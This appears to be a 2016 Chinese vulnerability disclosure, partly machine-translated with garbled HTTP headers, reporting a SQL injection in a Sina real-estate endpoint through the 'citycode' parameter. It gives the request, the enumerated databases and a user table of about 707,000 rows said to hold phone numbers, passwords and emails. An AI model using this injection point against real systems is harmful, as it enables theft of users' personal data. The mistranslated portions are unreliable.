新浪某处SQL注入(union跨库70万/手机号/密码/邮箱)

漏洞标题 新浪某处SQL注入(union跨库70万/手机号/密码/邮箱) 相关厂商 新浪 漏洞作者 null_z 提交时间 2016-04-24 17:12 公开时间 2016-06-09 12:10…

漏洞标题 新浪某处SQL注入(联合跨数据库700,000 /手机号码/密码/邮箱) 相关制造商 新浪 漏洞作者 Null_z 提交时间 2016-04-24 17: 12 公共时间 2016-06-09 12: 10 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 12 漏洞状态 制造商已确认 标签标签 字符类型注入,Mysql 漏洞详细信息 注入参数citycode GET /di/positioncommunity/?y=30.478509069093036&x=114.3076242453857&citycode=bj*&_=1461484523118&callback=jsonp5 HTTP/1.1 主持人: bj.esf.sina.com.cn 连接:保持活动状态 接受语言: zh-cn Accept-Encoding: gzip,deflate Referer:http://m.leju.com/touch/esf/bj?ln=ljmf_h5&source=ios&s=yd_kdlj 主持人: bj.esf.sina.com.cn 接受: */* 从对等方接收数据时失败 [*] mysql [*] performance_schema [*] shop_admin [*]测试 后端DBMS: MySQL>=5.0.0 数据库: shop_admin + --------- + --------- + |表|参赛作品| + --------- + --------- + | sp_user | 707287 | + --------- + --------- + 修理计划: ~~ 版权声明:请注明出处null_z @乌云